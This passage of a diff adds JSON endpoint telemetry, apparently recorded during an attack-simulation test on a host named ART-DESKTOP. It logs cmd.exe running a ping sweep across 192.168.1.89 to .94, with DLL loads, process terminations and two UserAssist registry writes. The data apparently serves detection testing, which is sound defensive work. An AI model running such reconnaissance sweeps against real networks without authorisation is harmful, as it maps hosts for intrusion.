"logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "process", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572411840000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.89", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1748, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572411980000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "event_type": "process", + "pid": 1748, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572416990000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.90", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4832, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572417130000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417140000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572417300000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "event_type": "process", + "pid": 4832, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572421830000, + "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.91", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572421980000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883572426369984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883572426369984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 1532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572426990000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.92", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427140000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572427300000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "event_type": "process", + "pid": 3068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572431830000, + "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.93", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5088, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572431980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "event_type": "process", + "pid": 5088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572436840000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.94", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572436980000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + 